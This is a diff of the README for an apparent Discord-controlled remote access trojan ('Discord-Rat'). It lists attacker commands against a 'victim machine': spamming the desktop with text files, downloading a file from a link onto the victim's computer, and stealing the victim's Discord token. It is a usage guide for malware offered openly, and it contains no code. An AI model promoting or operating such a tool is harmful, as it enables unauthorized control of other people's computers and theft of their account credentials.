AresAmigos/Discord-Rat/README.md

-desktopbomb - spams the desktop with x (where x is a number) text file desktopbomb 4 (will spam the desktop with 4 text file)
+desktopbomb - spams the desktop with x (where x is a number) text file

-download - work in progress
+desktopbomb 4 (will spam the desktop with 4 text file)

+download - download a file on victim machine, if the complete path is not specified the file will be downloaded in downloads folder

+download link file_path.extension

 dstoken - steal the discord token of the victim